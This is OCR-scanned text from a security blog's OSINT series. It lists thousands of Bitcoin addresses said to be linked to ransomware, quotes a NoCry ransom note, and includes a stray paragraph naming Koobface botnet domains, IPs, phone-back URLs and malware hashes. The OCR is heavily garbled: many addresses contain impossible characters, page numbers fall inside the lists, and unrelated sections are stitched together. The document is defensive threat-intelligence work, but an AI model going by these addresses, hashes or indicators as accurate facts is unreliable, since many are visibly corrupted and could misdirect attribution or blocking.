1CDPuKDSPgvGM8njY4CLRfsTW5Z6DVBLu6 
1Cdriua7qGs5mCm3kWDqdRR69XVkKVVQ4UL 
1CdrUcROGW5TJqHvxXwtDUtYdcHF6GsjCES 
LCDSRPNUM1TJxdD8qnbFuYL6K92m5jABih 
1CdSRqi4etdWjNKbtCWUG6fujDNWG5Lyzx 
1CdtZ4eS7NpAiK8g5Y2WjGpzPxWq96fLvE 
1CdU8mBnXJSM8KAugtNS9dKutXNqjkKQHzD 
1CdVU9sZxqxyfzdCosFRg6sxAz9qDgizNt 
1CDvzaP12bfW7kWNykpEYjJGMPWijF9e3RN 
1CdWs3Epiz7ZN3nX7Srnh6étUvBmkknCUm9 
1CdwskKf8HjkLGcUKyyg4fNKyUd2f9YPAbd 
1CDWX3VBGSDxCJeDhE3ziHFD6tSgymuKox 
1CdXpCraoL93Ku4Mncbs4XEUcP5tveqgQs 
1CdyQEqfXKYRA5tpqKMZNfGoR7oCkTtUK9 
1CE15dQwVRLI1rBtrau42iD6Tq19i9J5Wr9 
1CeLhbPiaNbCihKTS5SVPAYYvPXEdpHue8b 
1CE26mb6diB4dynoUfZVvXjEJJpvzr4oCx 
1Ce3x2MnUJRoxd5GWaZuivrteoHgGehwEp 
1LCE9QiINA7MHt4BzyDZL8avAHHxs74f8BmD 
1Ce9qY3unPuzf6oW7U1lvvgwSA177SdfP6q4 
1CEarXnTcwX3zZRGFJz8pK5QKDbc7maiff1 
1CEaU3KLxCfwdeuoWu6ZzdcZKYeA6zZLMYX 
1CebDHbrMpkC)]ba4VHTQAVhBiwkkhYyhxb 
1CeD3uJoYduLUW31nU7GoKQ3sj5AvUtR3a 
1CEe1l6bYSc4tRkKZMDLyomDY1PdgR1iuWUaB 
1LCEFKz4Zwfd45HNedDJW5pdUPjTujjYh2p 
25487 


1CeFr8PjF9jteC7 mDzwa5z] CXVWsqv8z3X 
1CegimVkZXQmbJdVmP2pt90Hx6bwmyAWAY 
1CehBrRR4ENKER1CaPttPDPoxXw7A3sr3jM 
1Cehde8Uh5cDD8xzeFALFHgAGv7ranGw3S 
1CEHpXdzB8XZHkKSE4y3GHtiMry69j2sqU 
1Cehq3aBXEBogjhgHHuA2nLsyYSAfvUw8di 
LCEiPGS9GK28zcugEQJh4neCéxXRJizbi8L 
1CerteaZtpJ3n8rg1lpMSL4tQxejJAINDVL 
1CEStJByjceEZztpu9K1f9pxoXGPYKQzxXJ 
1CEtMPDVweKEvqpagFakLsaHGQHktZ8wB9 
LlceUU7FkKW4A8gXP76wg4Vq2o03npDJscx3 
1CewPhnEX1qYDgiRilekMLUWRZXPrxCoVY 
1CEXjUqzWB2MBPmogf58wBn8GaYcWHuzGk 
1Ceydr3vHpRG5vxXYhb6E9bnKDU69yCuFmy 
LCEyThbf5NHuHZWJmYzFts71UdvjDJVNfA 
1Cf3L5mvYalqcu7JoYHm8hzsEUzEnidelu 
1Cf4s5 7ErgQJAibuE3tzcWUPJaBpKb2GAc 
1Cf4YnMWX7dDRCMxZNdUs8QGc33Ka6TaRY 
1Cf5g1pFHJpj4zqB9nxXxLdp20sZq73CN8F 
1Cf7JHs2aMwtd1uU7yjNRNAySXaiYZr8i6 
1CfaC9WbZkB1SRAWvrLoCPnUbECj6ZKxBH 
1CfatHW33nKPDXWé6dcgEN3a6bTyMgssPcn 
1CFE13qHQrocMzWaNoZeB34uQM4wWEY8mC 
LCfEUZNRYQyP3y272)7BjjtoGh3keDjrte 
LCfEYERGMCANsGmrQBgvadCAbqwFHr2kGc 
LCfFqJFZU2HSOF]x9JGb7Ck31CyiLginUh 
1LCFj5ProbRnCLD5KMadBEhjrPZf59VLhdCv 
1CFjwJhfDDzg2ZQFb6C282x6WDWZLtZvV6R 
LCFL9OJYjS48NvV5nHgEMhXiqz5JKvU2kvTv 
LCFMGi86x0o2WNmVab8pN2vwuWzj3MugpmU 
LCfMNPWO6XioFC1An9h60EYGGbSJGtpdvsL 
1CfMudBJRC95s8QUcyP3QjfM 7oLoSKxJua 
1CFnyTB5ewvVRuFtM3RsjyP6xLQXqiWGTB 
1CfpjLQHUmMEk7QZ56UbtNjBNYwXFrPZsdNm 
LCfqVEFwVSh49n7LTCq5jD3ZLrgXzilalf 
25488 


1LCFrUbWj84iykw4a7PVq2rT8NAxKed754F 
LCFT8BKYxH3o0yQytfZFJ4a54mxYHp3yzof 
LCFTfNyXJZ3TXjuFfYEF7ae8QWUsPp7BG4 
1LCfUi0 7NXVAz9sutWbuRchHfpEFE4cZU0V 
1CFuPty19g28xiV9OrkcFmMQy2UfjU54XuYL 
1CfvXZuzF9tZZHSYchgquzurQWoVBVKXkd 
LCfW1vnV93jBmMHuiBQ9VKRnN4H8HQEQBfDu 
1CFw62er6ZVq73FvaZ2wtvA1lrSKhD98DRH 
1LCFwijzkVtUvKtXwZtg8aF8014UpY8Dibg 
1LCFwT2X4wp7DsDegHUYDJgE7UbGbkALxbm 
1CfXF3Hq7brB6gM9tjnPwmR2NhsZEvGKfb 
1CFyoqxDRZkKbx7GVExUwncFTfDyDA9Atu 
1CfyrpCCskfYfDZmLYmrGLxXr6CXRus5NDp 
1LCFYtfobFUUDFAN3qq6fDLgjiPR7quPVkKPW 
1CGAm7zZkOoUEXYXpccsY1x9pAATtye9Zad 
LCgATxj 7PMUmUd5 lirwcVHsK3kCfyxHBnQ 
LCGBzwJ4YYJ1XJh8W6Lgqgt4672R8cUyt3V 
1CGcPeNN9bDGXAtCLVZ44fqtY6JmNDkvkN2 
1CGdXQGvg6PmnfMS88aVCq9zurxHmadclk 
1CgfktluD4gagVXwZPoeJe79zJTKQDCuZi 
1CGg66gw3pJWMfe7ucNxcQqgEG3uxw6ya6V 
1Cggm5xDc1FzxF)xqrPo9ZSHXBCmu6aWAS 
LCGJTkjEHrpLxCj2i24ksQ4XUrUKYAm8o2 
1CGLPueM7Rc2bejdBV5AAX8vttW4mKWavi 
1CGMdMbno26BXHADLXaQkAxqvVv4WhF5KC 
LCGMjNi8DgQWSNGJoFibhkDcjJoNzadRbs 
1CgoxgpvuTUsboiRPhg4Bth2keu3AUqCLL 
1CgPdR1NwSaltcfTkEDCcyFhvJhwbS7VDP 
1IcgpEyuLprrfecL67zahpQkTItc7ZTpPB 
1Cgpj69A97jqecfHorB4UzzvF41xyF5HaD 
1CgPjiKbG5yMMUaJB4Z4WTSagcWFbs27Eq 
1CgPSk5uNyNRZXE1QvQLdou46cug2qu3fg 
1CgPV4uH4u4Xbt69vpawHvAJhp1WQxQExq 
1CGW4cNwoMsFAo9XFL6HxBUVZLbKobA4zm 
1CGwi71lynoPCjmuRZoTPT6jZ5claCWeAuR 


25489 


1CGWayh7LhT5UVUErNCEVmJ1DMvtVzBPSC3 
1Ch3JHQtLEQR4a5YuBSbXHGkbar9pkp3jj 
1Ch61B3f3USmhdwuCApkmwz6Yox1SmdGUq 
1LCH8vWSinaEKJ TAYFSzx3PeByn1Z4RQdip 
LCHCGD9gBrU4vv4kkYN2S3H5HahokYEtj8 
1LChdiWsRrMfPA259TzGnCoygXqZ9aK8XEp 
1CHekKkmY3C4sHrz3Zi5mtzuNetvHR2HbKS 
1ChFnJnsSoxXn1E9bDFB9bPt6iEmML7cL4va 
1CHGvCwEG9Dosk7MNwV92mpwosCSAWas7F 
LChHMXUs6b3TwvBnUR3M7Q5iAvfHrGeitS 
LChhPDAbgnE7yq7UitMnoW3)JQnkmt344ds 
1CHka7okK5AgpdVjq4CoYEcNSr2KGaE5YaG 
1ChMo3hx5rkKmdDbCRGfQsYZkCs434xZna 
1ChmXhLWFLHPs8mBh4j4Kx76KAhmMHRwxXx1 
LCHNcNabAyQHGGaVHwpe57ZpeaWZRpkzvD 
1LChNwjJg482Xg6mGstsNkKLHEDrgz7B20D 
LChNyZf5CZpmptycEPTURqGc9TSZuenPgqn 
1CHousVo6PDYG5G1QTowXy7DLe3HN9Zihf 
LCHpdHbQh9L8WnivREJk6eTRFWWBKGDTqP 
1ChREDRgGiIMLeBsXJq9c4YMpBivAdPK8ng 
LChR8THLu5f1Y7qZqLhZDfhTrNLcH2Pio9 
1LCHrVZwmUpr6snBbMBEMiRayhBeEMNmfu5 
1CHS1dv6tCSzkifnsSGytPrwLBHQsuR5QR 
LCHSH3TPMUMNjugPUhNJrxA9h5WdFR4b2T 
1CHstZoauvDsmoXPnwW3UWF8kEemK98Cvb 
1ChsychLd25Bcmicqn6mmC5xcyY2SAtCV5 
LChuFLSVVjNZPCFT2thgaL7BUbmj3FFxjZ 
1CHuxX4eAJfj3eg5PB5ufzvxXzmuah1NTNG1 
1LChxHxrmWhCf] FePV2r9ABtpRkfmBDf7QX 
1Chy6n83R8gknMK5jYMAjBSRW3pdBNoNCr 
1Ci3kSS59KRGew4MoShMycSLNro5VyCdfc 
1Ci7zndBcT2dbe27TSQFTENXSNtJ19dggw 
1Ci8yrgMKP7LDyLNgPjp60B8eVvjxDhQujC 
LCIDZFjJdWXbLjZjly1TCiCrygUjTvqgZLD 
1LCiFrPorgyAX2MUSE2w1UXxGhhX5UpoXQs 
25490 


1CifrzvS81mRpFjngGL4izzAMcketnUD2W 
1LCifYheiEmMu8NHo8rfy7FY9I6FVNCATNYgG 
1CiIHQADy3LTTrapuLDWKZaqZbQppS8WU3G 
LCIMWzLpg4LWu2CjxpUcv7D13ju1lSG1rxn 
1Cin19exPxd2ebJEXQJYXMUTotimkKz2uK 
LCING9dgqJKMSVQ08j7Jp2aM3PqJm1LYz3R 
1Cipv6z4pNayqY5Es9yXhVMmR7f5VnKpc4 
1CiSxKMAv7LmMmbAU1LHJ4iwHKjc8hsg4d 
1CiuTs3immgqT7ww5DJL53EFGEfi3JwkKgy 
1LCixhofzFTi8nfamVCAB2z9qkjm3f3CbYX 
1CizDDC4xg4HQK8joJJEVearmRQYKrh2KV 
LCiZtAgqcLxNTi9Sjh7rRfFYBIZf8BHMWPc 

1Cj 7bpDf7JzhuKq5eiKXXsgBeouNudwDXP 
1CJacKrEGFL7eTkKXC7Em2gsmX5K7nSRKf3 
1CJanmQRbPcF8duwnvQxgBZc1WUTEPXV8R 
1CJbs3pHFuURmMMmAuuU5RZxQQoUyTrfS6Stv7 
1CjbVeM2sBK31hq5adcNTMxakuwicck24m 
1CjcC8gd6GjDZHuLHvuxXhpAJG4GqwGhvfw 
1LCjcyKowFN8FmMAQW5ZUEdxS88co2pHTuly 
1Cjdc7Ks6fmyGcf8AJSxqpCC7z6apyhrD9 
1CjdXQD5ucy6nEwjDVzdSDepbtZkM 74fiw 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgje56P1fdd21n8RdMQ9GuNpROGdpLODpY 9hUXR5t48Zp1Y9 
scGALKjFIR7rhEqD_IKKJCF1--wYMs6XvswHaxZ5DHxyLONYqsIds 


18.10.8 Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction 
IDs and BitCoin Addresses - An OSINT Analysis - Part Three (2022-10-25 16:36) 


[1] 
25491 


NoCry Decryptor 


Ooooops All Your Files Are Encrypted ,NoCry 


Can I Recover My Files ? 


Yes, You Can Recover All Your Files Easily And Quickly 


But How ? 
Send The Required Amount And 


$ I Will Send The Key To You For Decryption 
Your files will be lost on : 


See You Soon (0_0) 


About bitcoin Send $100 worth of bitcoin to this address: 
a a 
Pe oe oy ORE Obitc OIN Fittask425p26oRédTax6gc4nkoKn@aiVwk 


Dear blog readers, 


I’ve decided to further extend the ransomware themed BitCoin transaction IDs and BitCoin 
addresses obtained using public sources post series with the idea to assist everyone in their 
cyber attack and cyber campaign attribution efforts. 


Sample list of publicly accessible known ransomware themed BitCoin transaction IDs and 
BitCoin addresses include: 


1CjE4u6zsfwiqsAxFfan4kheWvMUi32yD4 
1LCjFGlut9feQ6DyB721j29FJLt9xMJLaGz 
1CjisxXAFpioecjoPy3sJtCmbU29Zrft3de 
LCJoByHEYp5EAM5tyE4nbvtDcriF6G2Htk 
1CjovsERQeDpf8SrxXSG2RvaEdPEduoVkhx 
1CJGQ6QkM2yqyApZQBbkKyZadS9VDBeb5cQ 
LCjSGnkNbJEFNg8pxNS4mEfymgtPhaPazZ 
1CJstVyNCaVcZ8gMFeW8N4w85BbuEdRNay 
1CjsXr9HyrFUZErAkvHBX6ZoQk9t3ekYMh 
1CjSyBQK7vQyFuvqxXX5YWP1cxWYe3CG27D 
1LCJTK96xQFRD23KCDtRypmi3bwcHrKTKxx 
1CjUowKFHKavWBZiYTXsbzDEXLbpYWtLxXp 
25492 


kiano-180809.com 


kukuruku-290709.com 


pam-220709.com 67.215.224.0/19 ————4S-ge s22298 


67.215.238.178 


rjulythree.com hosted. by.pacificrack.com 


$UZ11082009.com 


ul5jul.com 


So which hosting provider's services is [12]the Koobface botnet using for the time being? It’s 
[13]67.215.238.178 - AS22298 - Netherlands Distinctio Ltd, which they were also using in the 
beginning of the month. A [14]new domain is in circulation across social networks/micro blog- 
ging services - kiano-180809 .com/go/fb2.php (67.215.238.178) Email: bigvillyxxx@gmail.com. 
Take down activities are in progress. 


UPDATE3: The entire portfolio of Koobface related domains is now parked at 221.5.74.46 
- AS17816 - CHINA169-GZ CNCGROUP IP network Chinal69 Guangzhou MAN. For instance, 
xtsd20090815 .com/youtube.com/xexe.php redirects to the actual IP 221.5.74.46 /redirect- 
soft/go/fb2.php with piupiu-110809.com/achcheck.php, web.reg.md /1/[15]prx90.exe and 
web.reg.md/1 /[16]prx90.exe as phone back locations. Two new components are dropped 
DDnsFilter.dll - MD5: Ox8904BCEBACB2B878FF46C5EBOC5C57EB and DnsFiltersys - MD5: 
0x30DD915396E46824DA92FE70485F7CF8 which [17]prevent infected users from interacting 
with antivirus vendor sites. 


2552 


LCjuQdVJ CgIgXVFFj62X33TfmfhtjjWu9m 
LCjUrfkvtZYVyHwu5ycx8cJTm5YOUY7pwK 
1CJv7HnyQCLsnoVFbxaLr4ctWaCtss8rwyY 
1CJVfuPxVrpmzjKxsV1lur284EwzZHJYHnWB 
LCjwNCnrbWoGLvSuXN1leUJCWétTYTRpeZv 
LCJWNtTnt1FkuKL4uCM13eLFArnJDMC2ps 
1CJxiEK7 DGf4Xs2C2N4LVH987xrjk9evvS 
1C)Ybm14TUtL5whc9WRbXVUAg3ircgeUAs 
1CK1sdhKbFg4Yh8d4o0F2NjUFHPpZTod5bg 
1CK6WPdyeoP71cRCRUXZwxAdUPAKra2Mgf 
1CKbDAqne5Y5NZkYG9UXOEOFxxwfL5f192 
1CKcg7SDU1JQW9EQHZACfugCMCBCqm3yaX 
1CkcUQi39qU5ke6z4s5ikXytu7eviaNWJQ 
1CKDK8qoWP1DYrCPudZyTH3LE7BB3C6W73 
1CkfmcuMSde1zSCY15c3UigoWtbUVkkCdg 
1CkfSgcAe7KkLaldMBugjJijt})WieSvGfLx 
1CKGj5iBiZcay71i7wVbPZuPqWm68y8PRr 
1Ckiqg)wS6pCnT 1L5EfKwWi7wFACccEmx8XW 
1CkjnzSeZwF5LbVN5KbZaHyKwafcleDVJN 
LCKjJZMPPNcxz9d8Yqt2Z6k5tU8HZxKGo5x 
1CkkgqjcZuLMgYpwu56uPk8qZE35pEN2gU 
LCKKUKKMf82fxrzGTgPNr397ovKiYh6p9E 
1CkMcaxFXybS9HsjSUXJpUjSEyhuJSB915 
1CKndEbH3YFiw5LQNmjHiNQBo8GoN2pTdd 
1CKoDrmmc6GRW86NaYbZrwWDtT2yT8YQeB 
1CKon2H43iu7SF1JDCQLVH4phoiTzbPb2P 
1CkriC51XTsrRdyi9sMskKTokDrFWH2GLn 
1CkrrEyL46hxsnmqGojpf4zEDtDeaP2Qq] 
1CksfRFMQhJAevi3kyjQ4Q3k6zgJGqYdNQ 
1CkSyo5YnAJZGY1VuFzfxYYZAefiYW9J8V 
1LCKUjJ6TGHZDCV1n63pdGmPAY92b4fEGQ69 
1CKV1NuQeuaq2izEp6 TsbQrwGt7SG4C9mM 
1CkwD26HPNaDBwWUjQK6ZPmfpmWH1aiDHUa 
1CKZ6VG4H5o0xi6mywv2P4GknXMT Tos3TGm 
1CKzo5eJKamcqCiGHpM4Lkx948rctnU1vu 


25493 


1CKZZE1ZfSUULk9rzks1jircUGFN2NnU8f 
1CLOVKRdi9sXhsyabNHDq22aNzZEVLyvwYb 
1CLb4eH7MXhQyMAGJaC2jjiXrnGs85fX8k 
1CLbmhfQH15suxyRP6YDq3fNr3vroUkDHb 
1LCLc4EfYtzR6BWtfVdNS1SCj4pVEWDD8Ka 
1CLG5V4whjJRkmtr86EdS3yMVqo1BDhCxV 
1CLKws86Tq6mm3CzRjRQcBZTIZyCjS4667 
LCLMS4ZKMkY7NymUKZYC3LcjMw8DPqXhBU 
1CLok897u672ecof8pReUxx45rzgwc5gym 
1CLswAtGk1CoLVyCbtK6KcKcXaL3JddKZW 
1CLt1XmD13fRJYFVt64Z9F9mMMCpd75vQ2X 
1CLtJS8bHL3ujNMxuzDN1X6d8BEm212txy 
1CLvjXwgasY6ifg6LSwAnHq9WYiwTd99q2 
1CM4MnoQUzyRs9GuJj6nWDFobmELGUWFDD7 
1CM6NPowjdhPWpGaMKuNiXRHke9xgt3XXV 
LCM6q3RWYcE28hMm6CBojviVN7MYYwRRdiQ 
Lcm8n9WkfuWKKGGLi92xNaKcBRxCr7xgx 
1LCM8VSUX6APPtEQwscoBGydGo4N4yZ6hmr 
1CmMANXHMweSd}J7zZ6QGQvoskTMTByNQZXaU 
1CmcoUdcjX5eJjiBMvLTFZK7TdPWNpJ9jCU 
LCMDhUgqQq5FINQzZZjH1gXwQAQTdxSWV/7r 
1CMdLyjaz46VpwqcnMeSKtJA8jrcPNxush 
1CmE1s4j2usNm6weCar2ewTGzhMaT7/5fhn 
LCmFX7ENQxWtdLNKEmkXqKZMqqcpqrK4VW 
1CmgcPiDAJeeibrN2XfBvaJr4adHsHujZQ 
1L1CmgVWGE1sxXvhVJmtUTAZm3sJRof1B84Nw 
LCMK1xutXtYyLPdxDhidDdnzkS1rnjeEhR 
LCmKwwCiXNCFq9FubiJvnPZtcNWqUfH8bS 
1CmmilmDVDRSErpXsi3QZkWjk71p1WuY1lv 
LCMpT6Bfyr7roGoVEzT29EZt1ltggMDc85g 
1CmpzebG9wkgPYNbYa4k9wytYUuScxaEzT 
LCMQDkLUQ680hYW7bd9Rvs7vDM9MXL8Baqig 
1CmR9xF4aD61rUgoel3nqKBY787WCWS2xU 
1CmSu2QJRNhHKUN2GKns4zkGGv1XCVjD47m 
LCmtAY2qWW538VvG56eU38vVgujv25Vjtb 
25494 


1CmTkCSZctdcBcdUDYZKdkptstjZ39mkjt 
1CmvdjtARoL2CMv2bfr6MXeGubjDAnbLCV 
LCMWGAdHQ5naoHvnvHZAKcyAwtxgF5pub8 
1LCMXGoJn8SbKRJqjzkyKUjrLSZ2kwFSXs8 
1CMzdJECehbhEXRRTXERSFnUKUmBRGogV6 
1CmZzoDTdaNCmMaqgqu74uF2yEsJNQ6CAum 
LCN1gYN8y8nuJ3R8WJBNKHC3bf6fWYthuk 
1Cn3TAPSZTAxGpqYNc6C49GPEjmpTR4VRD 
1Cn3xmfKzYyVk43hBPraHEiJdQpMUSYeS3 
1Cn4qUuYKibH7xUGbCG1x4sX7aJR7V4rT5K 
1CnAmszD6iIGZMNLpyZjbYbWkGfHQC22ofg 
LCNaYWPx1AVYUBVQk2zC3g7DVGGiszAxtv 
LCNCHMmB4pHtGhbiJGD9ck4jijz98VHDHn9 
LCNcRMXqXcfEaY3kE9ZMn1KqGxapkv4qmj 
1CnCZrhQdG47kEXA3HZH7ZGAbsDeDs4XAc 
1Cnedix7QFKnGkfP4Q1tF2xucHRxJKp53w 
1CNEZs5akS2K9WhtzrBf5vKrzh8BjwNQ8 
1CnFphPKD848fXW 7uhHWUVWMAAAoUerELV 
LCNGoXgv1LVwjpMpKfp7MhSKq8nRo9DxRv 
LCNJKQWLruNV5ejfSQgb3VKE5FH3Q1QpYU 
1CnKRvcpk3GZcki6pMbG8Pgs2ZJLPVKZ2m 
1CnkTT5B2AJ8BnybSxdCmDEALAPFU56aLe 
1CnLpveGjnL3T1la9h2N7ekZLQM9odjuxDr 
1Cnm7KPrV641b5YUf6P5j1dj1Vq8hW41D7 
1CnpDJPekpNCUKjsncEbDtrt2TYtKKQkX} 
LCnQtDQNnzFjEk2yGVQEszLJp8fcw2Ljxu 
LCNgZBEQtGoWjrsTLHS90TLgE8ytjgbiwm 
1CnUbG9QoH4wNfh4AAuhja59wwPM38p1sG 
1CnVD2x89U0Px6RrvYTeknGkVSxqky46yp 
LCNXvg5HQkwwogfVm2kTG2rDy8S4rWwA4ecx 
LCNyAnSBsxGiZtXxYNf4ttzspk3Esa8zVDA 
1CnyuR4D3wJ4LHRnVXCdDsWgdkHzK28cAQ 
1Cnz6gmw92jtaFaq5Aaz7jk5ijBQrKppf9 
1CoDclaNYmwGoV3RMfxpRRJVGAww5AvPKN 
1Coef9aaVKWWNZUjnBBckPmUd219dtiNPf 


25495 


1CoeHC7e2037KsDUekQuacK96P6VGeXRnD 
1LCoEQMHQ16euHF8x8ecyV5DkaZCYcwvzXa 
1CoEXJJJ5Utg8R3P5CtCwNozsoMn2Ttjt8 
1Cog88aRqnLfNx8UxnGTZBPtT ka2Mc4vH8 
1CognBErS1XubRHzT3JEnV1B1lwqoynHfC} 
1CoHeRCRd54AiJryYjC8YV3kyBcHf8g28k 
1CohGYPX2b3yyZJn4F13WJBnwr6érSxFhDQ 
1CoHK6gEDDAdr5gvu9PPGMEdYmAQoMLJjs 
1CohUDo3g3udcyhYq8aJb7kPt7 DwRYgAee 
1ComcQszPh95]8ppMzcR2cNik9CzZHnxvfu 
1Coqaqj2fH451phTKSec3wyQENjXcu8yP4 
1CoQr79pojsDTGkKuNAqUCD6veG24W18rQ7 
1CoQZ7vZAzZ6Aj1T93DorBkq2bkFV3jYE5D 
1CornUqQgyGGbZGYDpR7mtS8E4EchZ4uHp 
1CoTPkSYaQFn9hwgQB3C)|pvf7FSesGCOfi 
1CotRcfNKkrxBroPtavm7c4RAVns79cy6C 
1CozgjWmXaH69jxYiPouCfaYszkKBFHyLMK 
1CozVojst363psYFgPdbRZoxNRSbs8R2Rh 
1LCP3nNHIMM2Aq3kvMmEKfaxXdp95dCtgj2Fj 
1CP4emWw9NghrN2dmjd3DoKZETTKgTMUvB 
1LCP5CRvuAxZPAFtTD2QRkygBDjvrWQjm5v 
LCPcCNN1XUDscAGpJsDjSxSY6Wir7C7z5kxX 
1LCpgjqvA2ayHQ2fGUorhgis9MH9KpivPUY 
1CpgQBv4VeKBR8MzKrghV4bcYTa3VXsnt7 
1LCPHXKda2qzCqVKv4ij5zuizbfzdByuyGg 
LCPJ6kfXABG2xvetZMFQjLnNLaoygq85TXC 
LCPKCDFTg4kZdadQX4i2wv55JPyXnLnung 
1CPKxaQfZbV225ZtT4isGS9ejPWX5kBEjt 
1CpnX11iY6vxveFJFKVUN23dBvZsHvqFwQ 
1LCpNzwKjZKNuMgqYal1JVCXQ3wM)]jcalxyF 
1LCPONiTBHT3K58j371uVeKKFSVYNVokopo 
LCPQRhKYSHRWNHMqmdMivSWBfviYrVPWVj 
1CpqSZTDmjvbYEe5Hmy1QgipgYCxBpgpY] 
1CptY54LWUMdDukxxBV9PcpbDuzswrEAXY 
1CPukfQKrsm5bVs5ZcR2eP74zz]jY1jqw7 
25496 


1CpuoHmTqQfrVRgj69AaPtuGgNedKhCKkyw 
1CpVQJcyGZ8bkV7HrDWHr4H5HjWupagzc7 
1Cpw46iAmaNaxLy2qopoDCoM99VzgsWG7uLr 
LCPWotBWAe55fU3c3p5zhsNsBw2TEFgRBb 
1CPXQRNFNgq3bwnLQT/7Q2mfZBkKHUUBbfSS 
1CPyraGxkqWkSQ7PonFKhr8mnLRhL52TAN 
1CQ2iM40pqxRECxVv2Q21PUTCKYNZkTj5c 
1Cq3x63a24BazXP96QHuxtnX3wmCPx7zTa 
1Cq49GmuaABKgzvZ8s61Kqx1xn1MfYVy5Y 
1Cq4Jqvjtjj6UNamo7uBPLSg9xSNzgiMXn 
1CQ9usdQoiK1rh1JVoLbxVLfomcx3PkKWEB 
1CqaldJdPVVThB5M1c564ZNWHwjxCRh2C9 
LCQAJYcBEsSZttqcm6Z73upnf|/HWYydalt 
1CQARe4a5Baqarf7 HdRmMfeBSCjyhVDK8BY 
1CqaXx62G9hMCds5FDiILDgJSDLhT2xdM3v 
1Cqb8Rf5DJMjbpguiyFkpHnYGTGCBzpUc3 
1CqB9RTHCcdR2bGJBsUptygsq6SMk426X7 
1LCQfsYELF5bmJrEcUHyiNVED9qwLVKYEdd 
1Cqi28SBfmWe6ynNZGhSof7K6ZjRpKaQWo 
1CQj4uBP9gPgLedNHCHiJjFCuW9wzkLLko 
1Cqj5a80wBNN9w8qP6QFyledxyFCHB990W 
LCqNNhXy8vs5gRk9VdjkhofMcdpdV9Lvsu 
1CQoZG1liyqe1SkMMRe8hD6wPzgh7bNnDzC 
1LCqPiMobRdRenwb3hWp8wQmof3uGSjknDT 
LCQqMTTMWA2fEs39LCEJDiCpfL2YL2JU1w 
1CQRGIWQFaHWRoPtBuV3SHINV9H80XVW9Q 
1CqRjrkKQM7bykqUMKzDD9gQL6C8ZVBSNTv 
1CQRLgsgaadSDf9i80twjRD2PXFs48uyCw 
1CqsxTP2eMQos8ttTGPcrmUCWt2r8vZ85F 
1CQsZh55r9rh7qSAJmnUNFDw3PWA2uoySg 
LCqTwtRcvPhx2iMPVPgtezcXT4JHT Tpnmp 
1CqvAU131PYB79hyB6ENCWURX9GLZ6eG1sR 
LCQWKSNPU42G4eVS1AJUVLFFCkTyQKuwfr 
lcqWTre5RUqLFWgkK9mz4NkDvpeT2GSZ2k 
LCQZBUhLB8X5ifQU9JNb3UsvWa8PfBNAGj 
25497 


1Cr4barsYtfcpBus8jySDHZVYf8u4kiZol 
1LCR52hcjpMTQbZ)JXgMPggD42Yx3DMdPpVG 
1CR92CVFq3aUV8hhR4Cyr9g3KwymmyYsreP 
1CR9YIF5PKzZgkjjJSJpjCobZNkKGwqPM5BsoB 
1CrBKKRyo4MEuu4RurEqnCnpRsp4GRvpx3 
1CrCsp6xFdgdV3YvvXP]jq6G178u9up3gU 
1Crewphfse9GjqS5WNcvAUSjWrxBT4nC4Mu 
1Crf9xMwXESsF24YSk5aowy4ELu65esUwl1 
1CRg6Wjea9Gad1s]xoMZoShEmvaSAGhNQg 
1Crgv4gJShHtTVMFNxM1C3ATTd9ZHnNSWhXR 
LCRHJWQYG6AFjCHNTrVw5y8TShEqVunoaw 
1CRJa6VTtiFEcReZjpLWtHBmMXKkdUTW3bv 
1CRjKkqF36Q9Jw3ULAUEWBCE4sTdcEgobWH 
LCRKNMWtnBV5XyAD5sdXaw878AdDxMFClv 
1Crkzdxj68V6q1tp8Fe6twFB17vWnZeltW 
1CRSb50FpYZLESxsRX93synqZfmGXNkAyG 
1LCRT39Np5hGd3mBLSyewjJ2yB9OWHmNpR3P 
1CrW2Rhygrq85TymVPwWwUfC6E2KXxFDeqNn 
1CRxWueYLq5Ewx44915sR3zG5voy8mQ|W4 
1LCRyTtWJdt80XRvmevjLxbSFCXVxrpdewu 
1CS3AyeQhDU6usKMCiIRNWSvGBJzbFhpYQr 
1CS6ids7TQUXgVYA4Np9tsB8VYYvgBSidu 
1Cs8DYEG2rSZgBuEttLeKgtMz]m9fxMmDj 
1Cs9YNhxgMRwoYfvv34qvcUUf4cdWSVd5K 
1CSab7BXhGcujRdXhEJ4sCQZ5RrdPWEyQB 
1CsbYMV5nrd4NP2etTpFpDmEyp6p4NjVNJ 
1CsDQxARMxd7aE54WSxyiFwWENNSSVSF8V7 
1CSE19kywtBXsDFBXxTagFAkKTTv67h3TSf 
LCSFbUYKMjhK2Va55petwYQroddXg8NtSK 
1CsfHmsyDCfalYZXR37Q9MgZqx9W2Ni2Tz 
LCSFW5adTSahyZL7VLNhA72yqNEhbjP17a 
1CsGledZ5uRnwzEu2zK5nxXh3xsSaSL43Wu 
1CSGgLGiESUMCAmddoEZuHGqRxojgnP66h 
1CShcT3AF2Jg1163FFU8f]bqmUK5HAXMZL 
1CsJoXHnkKrBhVhkf5W4jsGWrQF8kKt8hR7 
25498 


1CsJPocyvTFYZFBPCATjtgBbswhsG2WVWc 
1CSMEMCWcBwsdmRY7sWGwWHCcRT9Ca9nJQe3 
1CspEr8bA1jgwCTPhYxNV98PcPwtJbssiA 
1LCSPLY3pg87pHrelsWgSrl1f7gcLVwGEG/7f 
1CsR32D2rY7FXkDVh474fsyBcdEfi52zqy 
1CSRLoCaZWGi4dtaYm6V9ExwSsXJhL9kdi 
1CsW1b5UPVQyjRvEJZ8G7eF373yRb3HmMn 
LCSWAMWE6MCKB5t7UcNnmkW)JxooY4E5iHGc 
LCSWYrMgcRMJKgViIGBNcPxyPrDppfWp7jT 
1CSYZopXBwvVC7LC6BR9eVEZMiTaX2NySR 
1CSZWFD25pZq2x7hvu67CKMTU3LZKVDp4T 
1Ct5BskbsiSRPKQFFuUX3e0ecJvT2jd3Kf 
1Ct7gnFBCrEVxx34N8Njikz8Z2hEKfnV7y 
1LCtBLFS91G806L4Tk6t7UiviqQzJMKgejP 
1CTbPfte9LCqiXHRFPgLaC5q34xNRRKe9o0 
LCtCUEpZnjkc77mT79LBeDhWhekmwebu6Q 
1CTD7HZLrLnwXB 1iQv5uh3ELDKbX7Zhaqq 
1CtDsnXw4839fSHTXV8UVhA2rpXw6BSzjb 
1LCtEiigkw2agMUL1Jhwa6ogiaboJk9MkR} 
1LCtFtRa4bMBwhzJvDbpUrrPsP7Gddi7Num 
LCtFWbp44gvmejR93rbjjBNGogsblvdN8R 
1CthcSgC48cZL3kWtGE8vVZnYdjx4uxRi2 
